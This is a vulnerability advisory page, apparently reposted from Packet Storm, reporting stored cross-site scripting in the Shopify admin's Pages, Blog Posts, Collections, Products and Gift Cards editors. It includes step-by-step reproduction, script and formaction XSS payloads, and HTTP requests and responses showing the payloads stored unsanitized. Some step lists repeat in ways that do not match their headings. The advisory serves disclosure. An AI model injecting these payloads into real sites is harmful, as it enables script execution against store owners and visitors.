Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Shopify Cross Site Scripting

🗓️ 13 Mar 2023 00:00:00Reported by Andrey StoykovType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 261 Views

Correspondence from Shopify regarding newly discovered XSS vulnerabilities on their website. Vulnerabilities found in 'Pages', 'Blog Posts', and 'Collections' functionalities. Exploitable areas include adding a page or post with malicious scripts and insecure handling of unsanitized payload responses

Code
`Correspondence from Shopify declined to comment regarding new discovered  
vulnerabilities within their website.  
  
Although 'frontend' vulnerabilities are considered out of scope,  
person/tester foundhimself a beefy bugbounty from the same page that has  
been listed below, including similar functionality that has not been tested  
yet.  
  
Two emails and several reports, the 'hacker-1' staff reject the bid for  
findings.  
  
  
Online Store -> Pages -> Add Page -> Title -> Title_Name -> Content ->  
Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>-> Show HTML -> Fix HTML encoding of  
tags from  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
  
1. Browse to Online Store  
2. Select Pages -> Add Page  
3. Set Title -> Title_Name  
4. Set Content -> Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>  
5. Select Show HTML  
6. Fix HTML encoding of tags  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
  
// HTTP POST request showing XSS payload  
  
POST /admin/online-store/admin/api/unversioned/graphql?operation=PageUpdate  
HTTP/2  
Host: test-img-src-x-onerror-alert1-test.myshopify.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]  
  
[...]  
"page":{"bodyHtml":"<script src=1 href=1  
onerror=\"javascript:alert(1)\"></script>"  
[...]  
  
  
// HTTP response  
  
HTTP/2 200 OK  
Content-Type: application/json; charset=utf-8  
[...]  
  
[...]  
page":{"id":"gid://shopify/OnlineStorePage/...","body":"<script src=\"1\"  
href=\"1\"  
onerror=\"javascript:alert(1)\"></script>\n\ntest","title":"Title_Name"  
[...]  
  
  
Online Store -> Blog Posts -> Add Blog Post -> Title -> Blog_Title ->  
Content -> Paste Payload -> <form><button  
formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML  
-> Fix HTML encoding of tags from  
<p><form><button  
formaction="javascript:javascript:alert(1)">X</button></form></p>  
to <p><form><button formaction="javascript:javascript:alert(1)">X<br  
/></button></form></p>  
  
1. Browse to Online Store  
2. Select Blog Posts -> Add Blog Post  
3. Set Title -> Blog_Title  
4. Set Content -> Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>  
5. Select Show HTML  
6. Fix HTML encoding of tags  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
  
// HTTP POST request showing XSS payload  
  
POST  
/admin/online-store/admin/api/unversioned/graphql?operation=ArticleUpdate  
HTTP/2  
Host: test-img-src-x-onerror-alert1-test.myshopify.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]  
  
[...]  
"article":{"blogId":"gid://shopify/OnlineStoreBlog/...","body":"<script  
src=1 href=1 onerror=\"javascript:alert(1)\"></script>"  
[...]  
  
  
// HTTP response showing unsanitized payload  
  
HTTP/2 200 OK  
Content-Type: application/json; charset=utf-8  
[...]  
  
[...]  
"article":{"id":"gid://shopify/OnlineStoreArticle/...","title":"Blog_Title","body":"<script  
src=\"1\" href=\"1\"  
onerror=\"javascript:alert(1)\"></script>\n","handle":"blog_title-2"  
[...]  
  
  
Products -> Collections -> Create Collection -> Title -> Product_Title ->  
Description -> Paste Payload -> <form><button  
formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML  
-> Fix HTML encoding of tags from  
<p><form><button  
formaction="javascript:javascript:alert(1)">X</button></form></p>  
to <p><form><button formaction="javascript:javascript:alert(1)">X<br  
/></button></form></p>  
  
1. Browse to Products  
2. Select Collections -> Create Collection  
3. Set Title -> Collection_Title  
4. Set Content -> Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>  
5. Select Show HTML  
6. Fix HTML encoding of tags  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
  
// HTTP POST request showing XSS payload  
  
POST  
/admin/internal/web/graphql/core?operation=CreateCollection&type=mutation  
HTTP/2  
Host: test-img-src-x-onerror-alert1-test.myshopify.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]  
  
[...]  
"collection":{"title":"Collection_Title","descriptionHtml":"<script src=1  
href=1 onerror=\"javascript:alert(1)\"></script>"  
[...]  
  
  
// HTTP response showing unsanitized payload  
  
HTTP/2 200 OK  
Content-Type: application/json; charset=utf-8  
[...]  
  
[...]  
"collection":{"id":"gid://shopify/Collection/...","title":"Collection_Title","descriptionHtml":"<script  
src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>"  
[...]  
  
  
Products -> Inventory -> View Products -> Double Click on Product -> Title  
-> Inventory_Title -> Description -> Paste Payload -> <form><button  
formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML  
-> Fix HTML encoding of tags from  
<p><form><button  
formaction="javascript:javascript:alert(1)">X</button></form></p>  
to <p><form><button formaction="javascript:javascript:alert(1)">X<br  
/></button></form></p>  
  
1. Browse to Products  
2. Select Inventory-> View Products  
3. Select Product -> Title -> Product_Title  
4. Set Description -> Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>  
5. Select Show HTML  
6. Fix HTML encoding of tags  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
  
// HTTP POST request showing XSS payload  
  
POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation  
HTTP/2  
Host: test-img-src-x-onerror-alert1-test.myshopify.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]  
  
[...]  
"product":{"descriptionHtml":"<script onerror=\"javascript:alert(1)\"  
href=\"1\" src=\"1\"></script>","workflow":"product-details-update"  
[...]  
  
  
// HTTP response showing unsanitized payload  
  
HTTP/2 200 OK  
Content-Type: application/json; charset=utf-8  
[...]  
  
[...]  
"product":{"id":"gid://shopify/Product/...","title":"Product_Title","handle":"product_title","descriptionHtml":"<script  
onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>"  
[...]  
  
  
  
  
Products -> Add Product -> Title -> Product_Title -> Description -> Paste  
Payload -> <form><button formaction="javascript:javascript:alert(1)">X  
</button></form> -> Show HTML -> Fix HTML encoding of tags from  
<p><form><button  
formaction="javascript:javascript:alert(1)">X</button></form></p>  
to <p><form><button formaction="javascript:javascript:alert(1)">X<br  
/></button></form></p>  
  
1. Browse to Products  
2. Add Product -> Title -> Product_Title  
3. Set Description -> Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>  
4. Select Show HTML  
5. Fix HTML encoding of tags  
  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
  
// HTTP POST request showing XSS payload  
  
POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation  
HTTP/2  
Host: test-img-src-x-onerror-alert1-test.myshopify.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]  
  
[...]  
"product":{"descriptionHtml":"<p>&nbsp;</p>...\"><script src=1 href=1  
onerror=\"javascript:alert(1)\"></script>\n</code></pre>"  
[...]  
  
  
// HTTP response showing unsanitized payload  
  
HTTP/2 200 OK  
Content-Type: application/json; charset=utf-8  
[...]  
  
[...]  
"title":"Gift_Title","><script src=\"1\" href=\"1\"  
onerror=\"javascript:alert(1)\"></script>\n</code></pre>",  
[...]  
  
  
  
Products -> Gift Cards -> Add Gift Card Products -> Gift_Title -> Paste  
Payload -> <form><button formaction="javascript:javascript:alert(1)">X  
</button></form> -> Show HTML -> Fix HTML encoding of tags from  
<p><form><button  
formaction="javascript:javascript:alert(1)">X</button></form></p>  
to <p><form><button formaction="javascript:javascript:alert(1)">X<br  
/></button></form></p>  
  
1. Browse to Products  
2. Select Gift Cards  
3. Add Gift Card Products -> Gift_Title  
4. Set Description -> Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>  
5. Select Show HTML  
6. Fix HTML encoding of tags  
  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
<script src=1 href=1 onerror="javascript:alert(1)"></script>  
  
  
// HTTP POST request showing XSS payload  
  
POST /admin/internal/web/graphql/core?operation=CreateProduct&type=mutation  
HTTP/2  
Host: test-img-src-x-onerror-alert1-test.myshopify.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]  
  
[...]  
"product":{"title":"Gift_Title","descriptionHtml":"<script src=1 href=1  
onerror=\"javascript:alert(1)\"></script>"  
[...]  
  
  
// HTTP response showing unsanitized payload  
  
HTTP/2 200 OK  
Content-Type: application/json; charset=utf-8  
[...]  
  
[...]  
"title":"Gift_Title","handle":"gift_title-1","descriptionHtml":"<script  
src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>"  
[...]  
  
  
  
1. Browse to /admin/pages  
2. Template -> Add Section -> Contact Form -> Heading -> XSS Payload  
3. Online Store -> Pages -> Add Page ->  
  
<form><button formaction="javascript:javascript:alert(1)">X</button></form>  
  
https://test-img-src-x-onerror-alert1-test.myshopify.com/admin/settings/notifications  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Mar 2023 00:00Current
xss vulnerabilitiesshopifypagesblog postscollectionspayloadhandlingvulnerabilitiesunsanitizedresponses
261